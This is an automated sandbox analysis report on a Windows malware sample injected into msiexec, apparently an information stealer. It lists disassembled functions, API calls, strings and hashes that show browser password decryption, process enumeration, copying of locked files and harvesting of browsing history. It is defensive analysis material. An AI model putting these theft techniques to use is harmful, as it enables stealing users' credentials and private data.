                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                          • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                                                                          • String ID: chp$v10
                                                                                                                                                                                                          • API String ID: 4290143792-2783969131
                                                                                                                                                                                                          • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 529 4093b1 516->529 530 4094ff-40950b call 443d90 516->530 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 529->531 530->510 539 40950d-409511 530->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->530 553->522 555 40929f-4092a3 553->555 555->522 556 4092a9-4092ba 555->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                                                                                                          • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                          Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 593 413e79-413e9d call 413959 call 413ca4 585->593 594 413e28-413e35 585->594 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 591 413edb-413ee2 588->591 589->591 597 413ee4 591->597 598 413ee7-413efe 591->598 605 413ea2-413eae CloseHandle 593->605 595 413e61-413e68 594->595 596 413e37-413e44 GetModuleHandleW 594->596 595->593 602 413e6a-413e76 595->602 596->595 601 413e46-413e5c GetProcAddress 596->601 597->598 598->581 601->595 602->593 605->584
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                          • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                          • API String ID: 1344430650-1740548384
                                                                                                                                                                                                          • Opcode ID: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
                                                                                                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                          • String ID: bhv
                                                                                                                                                                                                          • API String ID: 4234240956-2689659898
                                                                                                                                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                          Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 634 413f4f-413f52 635 413fa5 634->635 636 413f54-413f5a call 40a804 634->636 638 413f5f-413fa4 GetProcAddress * 5 636->638 638->635
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                                                                                                          • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                          Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 639 4466f4-44670e call 446904 GetModuleHandleA 642 446710-44671b 639->642 643 44672f-446732 639->643 642->643 644 44671d-446726 642->644 645 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 643->645 647 446747-44674b 644->647 648 446728-44672d 644->648 652 4467ac-4467b7 __setusermatherr 645->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 645->653 647->643 651 44674d-44674f 647->651 648->643 650 446734-44673b 648->650 650->643 654 44673d-446745 650->654 655 446755-446758 651->655 652->653 658 446810-446819 653->658 659 44681e-446825 653->659 654->655 655->645 660 4468d8-4468dd call 44693d 658->660 661 446827-446832 659->661 662 44686c-446870 659->662 665 446834-446838 661->665 666 44683a-44683e 661->666 663 446845-44684b 662->663 664 446872-446877 662->664 670 446853-446864 GetStartupInfoW 663->670 671 44684d-446851 663->671 664->662 665->661 665->666 666->663 668 446840-446842 666->668 668->663 672 446866-44686a 670->672 673 446879-44687b 670->673 671->668 671->670 674 44687c-446894 GetModuleHandleA call 41276d 672->674 673->674 677 446896-446897 exit 674->677 678 44689d-4468d6 _cexit 674->678 677->678 678->660
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                                                          • API String ID: 1157525455-1702587658
                                                                                                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 705 40e175-40e1a1 call 40695d call 406b90 710 40e1a7-40e1e5 memset 705->710 711 40e299-40e2a8 call 4069a3 705->711 713 40e1e8-40e1fa call 406e8f 710->713 717 40e270-40e27d call 406b53 713->717 718 40e1fc-40e219 call 40dd50 * 2 713->718 717->713 724 40e283-40e286 717->724 718->717 729 40e21b-40e21d 718->729 725 40e291-40e294 call 40aa04 724->725 726 40e288-40e290 free 724->726 725->711 726->725 729->717 730 40e21f-40e235 call 40742e 729->730 730->717 733 40e237-40e242 call 40aae3 730->733 733->717 736 40e244-40e26b _snwprintf call 40a8d0 733->736 736->717
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                                                                                                                          • Opcode ID: 54c733009ceb17ba3f0e4cba36495fd391fc1e710870dd59ab81c679ecf631a5
                                                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54c733009ceb17ba3f0e4cba36495fd391fc1e710870dd59ab81c679ecf631a5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                          • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 115830560-3916222277
                                                                                                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
